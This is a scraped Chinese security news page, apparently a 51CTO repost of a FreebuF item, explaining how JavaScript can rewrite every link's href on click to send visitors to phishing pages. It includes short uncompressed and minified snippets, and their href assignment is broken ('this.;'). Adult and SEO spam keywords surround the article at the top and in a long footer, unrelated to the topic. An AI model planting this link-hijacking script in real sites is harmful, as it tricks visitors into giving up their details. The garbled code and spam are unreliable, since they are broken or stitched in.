成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

JavaScript控制href屬性進行釣魚

安全
前一陣子,發現JavaScript中允許臨時改變<a>標簽的href屬性,當改變其屬性后你點擊它可能看不出有多嚴重,但是,它可以通過欺騙手段來誘騙用戶透露他們的詳細資料。

前一陣子,發現JavaScript中允許臨時改變<a>標簽的href屬性,當改變其屬性后你點擊它可能看不出有多嚴重,但是,它可以通過欺騙手段來誘騙用戶透露他們的詳細資料。

// Uncompressed

var links = document.getElementsByTagName('a');

for(var i=0; i < links.length; i++){

links[i].onclick = function(){

this.; // 插入鏈接(你們懂的)

};

}

// Compressed (100 characters exc. the link)

o=document.getElementsByTagName('a');for(j=0;j<o.length;j++){o[j].onclick=function(){this.;}}

當你點擊鏈接,javascript代碼被執行并改變了<a>標簽的href屬性。令人驚訝的是,瀏覽器竟然把受害者導航到一個新的鏈接。而受害者通常會簡單的認為,可能只是一個重定向鏈接,這里我們假設網站的訪問者已經習慣了這種重定向現象,這一缺陷便可以進行網絡釣魚。

這種釣魚很難能被檢測到。很多人都使用JavaScript/ jQuery框架組合來綁定<a>標簽,每個<a>標簽的onclick函數不是那么容易就能解除綁定的。一個技術還不錯的黑客可以嵌入惡意的JavaScript或進行代碼注入,因為這樣很容易更新JavaScript(尤其是可嵌入的)。
 

責任編輯:藍雨淚 來源: FreebuF
相關推薦

2010-08-23 10:11:22

CSSfloatJavaScript

2024-05-24 14:39:33

2015-06-15 11:45:55

2023-12-14 15:34:19

2015-09-24 10:02:34

2013-03-11 18:04:02

2022-03-21 11:58:51

DDoS攻擊釣魚攻擊釣魚網站

2021-08-29 21:58:58

釣魚攻擊微軟SharePoint

2010-09-03 13:55:25

2017-12-07 09:49:25

2023-08-07 15:43:55

2023-08-02 19:51:33

2017-12-07 22:58:14

2017-09-14 15:55:20

2021-05-08 09:49:07

JavaScript延遲加載

2009-07-08 17:42:26

this屬性

2022-03-05 12:00:11

網絡釣魚網絡攻擊

2023-03-27 21:20:33

2011-03-07 14:43:25

2010-11-11 15:23:42

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 91人人看 | 国产精品成人一区二区 | 欧美福利视频一区 | 日韩中文字幕一区二区 | 日韩一区二区三区av | 在线观看免费观看在线91 | 免费国产一区 | 国产超碰人人爽人人做人人爱 | 亚洲精品久久久久久久久久吃药 | 四虎影视在线 | 二区av | 久久33 | 久久久久久亚洲精品不卡 | 久久久精品网 | 天天综合网7799精品 | 91在线看片 | 成人精品区 | 成人国产精品色哟哟 | 久久1区| 一区二区三区在线免费 | 亚洲成人激情在线观看 | 在线观看黄色电影 | 久草中文网 | 日本精品久久 | 美女福利视频一区 | 91在线电影 | 黄片毛片 | 久久久久久国产 | 一区二区片| a欧美 | 日本色婷婷| 毛片一区| 国产精品久久久久久久久婷婷 | 婷婷综合| 91视视频在线观看入口直接观看 | 亚洲 欧美 精品 | 国产区在线观看 | 福利av在线| 午夜精品久久久 | 日韩在线小视频 | 天天艹日日干 |